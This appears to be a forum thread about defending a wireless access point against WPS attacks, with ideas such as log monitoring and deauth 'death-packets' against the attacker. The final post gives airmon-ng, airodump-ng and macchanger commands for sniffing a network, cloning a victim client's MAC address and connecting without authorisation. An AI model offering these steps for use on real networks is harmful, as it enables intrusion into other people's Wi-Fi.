Here's an idea. I'm not that experienced with kismet but if you can have it log to syslog or a file, you can use a tool like swatch to continuously "tail" a file looking for certain data. When it gets a hit or detects some strings/data common to wps attak, swatch can be programmed to do something/run some program or script. This script can parse the log file, obtain the offending mac address, and send some death-packets or add the mac address to a blacklist. Just an example.
I think my original inquiry has been misunderstood.
I understand that the proper way to prevent WPS attacks is to disable it. My original question was if it's possible to defend against an attack in progress without taking the vulnerable AP offline, perhaps through DoS of the attacking machine. It sounds like this is not possible, and the only practical way of defending against WPS attacks is to either disable WPS fully or take the AP offline.
Interesting thoughts, Snayler and aerokid240. I'm fairly certain these tactics are possible, even if somewhat impractical. Still, its an interesting concept. Thanks for the input!
airmon-ng start wlan0 #monitor mode
airodump-ng mon0 #see all network/traffic aroud you. Chose one and use the channel and bssid in the next command
airodump-ng -c CHANNELNUMBER --bssid MAC mon0 #now you're sniffing every computer in that network. Save all MAC addresses working in that network. Wait for one goes down. Than...
ifconfig wlan0 down
macchanger -m MACVICTIM
ifconfig wlan0 up
Now you just connect in that wifi.
It is well told.